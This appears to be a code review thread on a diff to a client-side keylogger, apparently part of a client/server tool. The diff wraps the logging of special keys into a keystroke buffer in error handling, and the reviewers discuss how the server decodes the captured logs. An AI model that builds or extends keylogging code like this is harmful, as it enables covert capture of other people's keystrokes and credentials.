src/client.py

```diff
@@ -134,9 +134,15 @@ def OnKeyboardEvent(event):
     elif event == Key.space:
         strKeyLogs += " "
     elif type(event) == Key:  # if the character is some other type of special key
-        strKeyLogs += f" [{str(event)[4:]}] "
+        try:
+            strKeyLogs += f" [{str(event)[4:]}] "
+        except Exception as e:
+            strKeyLogs += f"(Error logging character: {e})"
```

Comment:
The error is when decoding it when it's being received not when its being added to the string.

Reply:
The Server decodes the Logs with errors="replace", this should already prevent errors